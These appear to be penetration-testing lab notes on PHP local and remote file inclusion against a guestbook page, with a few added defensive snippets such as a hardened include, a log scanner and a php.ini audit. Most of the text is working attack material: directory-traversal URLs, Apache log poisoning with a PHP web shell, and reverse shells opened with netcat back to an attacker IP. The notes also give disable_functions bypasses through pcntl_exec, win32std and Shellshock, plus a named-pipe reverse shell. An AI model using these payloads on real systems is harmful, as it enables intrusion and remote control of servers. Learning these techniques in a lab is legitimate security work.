LFI and RFI
LFI happens when a PHP page explicitly calls the include function to embed another PHP page whose path can be controlled by the attacker. For example, addguestbook.php below includes another PHP page chosen from the language input:
$lang = $_GET['LANG'];
include( $lang . '.php' );
Because the LANG field can be controlled, the attacker can put in the path to a local or remote file.
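Added example (not from the original page): the vulnerable include from addguestbook.php beside a hardened version that maps LANG onto an allow-list and checks the resolved path. LANG_DIR and ALLOWED_LANGS are assumptions.

```php
<?php
// Added example (not from the original notes): the vulnerable include from
// addguestbook.php next to a hardened version. LANG_DIR and the language
// list are assumptions for this example.

// Vulnerable: $_GET['LANG'] flows straight into include(). Traversal plus a
// %00 terminator (PHP < 5.3.4) or a remote URL (allow_url_include=On) turns
// this into LFI/RFI.
function include_language_vulnerable(string $lang): void
{
    include($lang . '.php');
}

const LANG_DIR      = __DIR__ . '/lang';      // assumed location of the language files
const ALLOWED_LANGS = ['en', 'fr', 'de'];     // assumed set of shipped languages

// Hardened: the untrusted value only selects an entry from a fixed
// allow-list; the path is built from that entry, never from the input.
function resolve_language_file(string $lang): ?string
{
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        return null;                           // rejects ../, %00, http:// by construction
    }
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $lang . '.php');
    // Defence in depth: the resolved file must still live inside LANG_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_language_hardened($lang, string $fallback = 'en'): void
{
    $file = is_string($lang) ? resolve_language_file($lang) : null;
    $file = $file ?? resolve_language_file($fallback);
    if ($file === null) {
        http_response_code(500);
        exit('language files missing');
    }
    include $file;
}

include_language_hardened($_GET['LANG'] ?? 'en');
```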
1. Local file inclusion (LFI)
a. Reading arbitrary files
Windows hosts file:
http://10.11.23.188/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
b. Contaminating apache log file and executing it
Use netcat to connect to the server and contaminate the C:/xampp/apache/logs/access.log file:
root@kali:~# nc -v 10.11.23.188 80
10.11.23.188: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.23.188] 80 (http) open
<?php echo shell_exec($_GET['cmd']);?>
^C
After contamination, the access.log file on the server looks like this:
10.11.0.105 - - [11/Mar/2018:11:24:17 -0400] "GET /addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig HTTP/1.1" 200 369
10.11.0.105 - - [11/Mar/2018:11:24:48 -0400] " " 400 366
Display the access.log file to execute the command:
http://10.11.23.188/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
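A detection-side counterpart to the log poisoning above, added here and not part of the original notes: a PHP scanner that parses Apache access-log lines and flags traversal, null bytes, remote URLs, PHP tags in the request line and cmd= parameters. The log lines are constructed samples modelled on the one shown above; rule names are mine.

```php
<?php
// Added example (not part of the original notes): scan Apache access-log
// lines for the LFI/RFI and log-poisoning patterns used above. The log
// lines below are constructed for this example.

const LOG_LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)/';

// rule name => regex applied to the request field (raw and URL-decoded)
const LFI_RULES = [
    'path-traversal'   => '/\.\.[\/\\\\]/',
    'null-byte'        => '/%00/',
    'remote-include'   => '/[?&][^=&]+=(?:https?|ftp|php|data|expect):/i',
    'php-tag-in-log'   => '/<\?php/i',      // poisoned request line
    'log-file-include' => '/(?:access|error)\.log/i',
    'cmd-parameter'    => '/[?&]cmd=/i',
];

function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        if (!preg_match(LOG_LINE_RE, $line, $m)) {
            continue;                           // unparseable line: skip, don't crash
        }
        [, $client, $ts, $request, $status] = $m;
        $hits = [];
        foreach (LFI_RULES as $name => $re) {
            if (preg_match($re, $request) || preg_match($re, rawurldecode($request))) {
                $hits[] = $name;                // decoded pass catches %2e%2e%2f too
            }
        }
        if ($hits) {
            $findings[] = ['line' => $n + 1, 'client' => $client, 'time' => $ts,
                           'status' => (int)$status, 'rules' => $hits];
        }
    }
    return $findings;
}

$sample = [   // constructed, modelled on the poisoned log shown above
    '10.11.0.105 - - [11/Mar/2018:11:24:17 -0400] "GET /addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig HTTP/1.1" 200 369',
    '10.11.0.105 - - [11/Mar/2018:11:24:48 -0400] "<?php echo shell_exec($_GET[\'cmd\']);?>" 400 366',
    '10.11.0.105 - - [11/Mar/2018:11:30:02 -0400] "GET /addguestbook.php?LANG=http://10.11.0.105:31/evil.txt%00 HTTP/1.1" 200 120',
    '10.11.0.50 - - [11/Mar/2018:11:31:00 -0400] "GET /addguestbook.php?LANG=en HTTP/1.1" 200 2048',
];
foreach (scan_access_log($sample) as $f) {
    printf("line %d %s %s status=%d rules=%s\n",
           $f['line'], $f['time'], $f['client'], $f['status'], implode(',', $f['rules']));
}
```

Only the first three constructed lines produce findings; the plain LANG=en request passes every rule.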
c. Transferring netcat and obtaining reverse shell
Kali:
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
Windows:
tftp -i 10.11.0.105 get nc.exe
nc.exe -e cmd.exe 10.11.0.105 4444
Kali:
nc -lvp 4444
Access this URL to open the shell:
http://10.11.23.188/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444
Note: to get a TTY shell, run
python -c 'import pty; pty.spawn("/bin/sh")'
2. Remote file inclusion (RFI)
Executing a command via a remote php page:
http://10.11.23.188/addguestbook.php?LANG=http://10.11.0.105:31/evil.txt%00
Content of /var/www/html/evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
Most modern PHP configurations disallow remote file includes of http URIs. For example, in xampp/apache/bin/php.ini:
allow_url_fopen = Off
allow_url_include = Off
3. Bypass PHP disable_functions
The server admin can disable PHP command execution (disable_functions) to enhance security. In that case, we have to bypass it so that our LFI/RFI attack is meaningful.
a. Use PHP code to download file and list directory
<?php
// List the entries of a directory using only file-system functions,
// which disable_functions does not cover.
function listDir($dir) {
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..")
                echo "$entry<br>";
        }
        closedir($handle);
    }
}

// Copy a file from $url (any stream fopen() accepts) to $path on the server.
function downloadFile($url, $path) {
    @unlink($path);
    $file = fopen($url, 'rb');
    if ($file) {
        $newf = fopen($path, 'wb');
        if ($newf) {
            while (!feof($file))
                fwrite($newf, fread($file, 1024 * 8), 1024 * 8);
            fclose($newf);   // close the destination, not the source, here
        }
        fclose($file);
    }
}
?>
b. PHP 4.2.0+, PHP 5: pcntl_exec
<?php
$cmd = @$_REQUEST['cmd'];
if (!function_exists('pcntl_exec'))
    die('pcntl not found');
$cmd = $cmd . "&pkill -9 bash >out";
// pcntl_exec() takes the arguments as an array and replaces the running PHP
// process image, so the lines after it only run if the exec itself fails.
pcntl_exec("/bin/bash", array("-c", $cmd));
echo file_get_contents("out");
?>
c. PHP 5.2.3: Win32std ext Protections Bypass
<?php
if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>
d. PHP 5.x: Shellshock
<?php
// Execute a command via CVE-2014-6271 (Shellshock) through the environment
// that mail() hands to sendmail (mail.c:283).
function shellshock($cmd) {
    // Only works when /bin/sh resolves to an unpatched bash.
    if (strstr((string)readlink("/bin/sh"), "bash") !== false) {
        $tmp = tempnam(".", "data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actually send any mail
    } else {
        return "Not vuln (not bash)";
    }
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if ($output != "") return $output;
    else return "No output, or not vuln.";
}
?>
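A defender's counterpart to this section, added here and not from the original notes: a read-only PHP audit of the php.ini settings and extensions that the bypasses above rely on. The function names and the list of sinks are mine.

```php
<?php
// Added example (not from the original notes): report which of the settings
// and extensions relied on by the bypasses in this section are still exposed.
// Read-only; it never changes configuration.

function ini_is_off(string $key): bool
{
    $v = strtolower(trim((string)ini_get($key)));
    return in_array($v, ['', '0', 'off', 'false', 'no'], true);
}

function audit_php_hardening(): array
{
    $findings = [];
    // RFI: include() honours allow_url_include; allow_url_fopen feeds fopen() in 3a.
    foreach (['allow_url_include', 'allow_url_fopen'] as $k) {
        if (!ini_is_off($k)) $findings[] = "$k is On";
    }
    // LFI: without open_basedir, include() reaches any file PHP can read
    // (the hosts file and Apache logs used above).
    if (trim((string)ini_get('open_basedir')) === '') {
        $findings[] = 'open_basedir is not set';
    }
    // Command execution: the usual sinks plus the bypass routes shown above.
    // function_exists() returns false for anything listed in disable_functions.
    $sinks = ['exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open',
              'pcntl_exec',            // 3b
              'putenv', 'mail'];       // 3d: Shellshock needs both (and an unpatched bash)
    foreach ($sinks as $fn) {
        if (function_exists($fn)) $findings[] = "$fn is callable";
    }
    if (extension_loaded('win32std')) {        // 3c
        $findings[] = 'win32std is loaded (win_shell_execute)';
    }
    return $findings;
}

$findings = audit_php_hardening();
echo $findings ? "- " . implode("\n- ", $findings) . "\n" : "no weak settings found\n";
```

Patching bash is the actual fix for 3d; the putenv/mail entries only show that the path is still open on an unpatched host.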
4. Deal with missing -e option in netcat
Certain nc versions do not provide the -e option for opening a shell session. Work around it by using /bin/sh with a named pipe, as below:
<?php
// Uses the shellshock() helper from section 3d so the commands run even when
// exec() and friends are disabled; the named pipe replaces nc's -e option.
function reverse_shell() {
    echo "Disabled functions: " . ini_get('disable_functions') . "\n";
    @unlink("/tmp/backpipe");
    echo shellshock("mknod /tmp/backpipe p");
    echo shellshock("/bin/sh -c '/bin/sh 0</tmp/backpipe | nc 10.11.0.105 4444 1>/tmp/backpipe'");
}
?>
References:
LFI:
- http://resources.infosecinstitute.com/local-file-inclusion-code-execution/
- https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
- https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/
TTY:
- http://pentestmonkey.net/blog/post-exploitation-without-a-tty
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Reverse shell:
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- https://netsec.ws/?p=331
PHP disable_functions:
- http://blog.safebuff.com/2016/05/06/disable-functions-bypass/
Netcat missing -e:
- https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/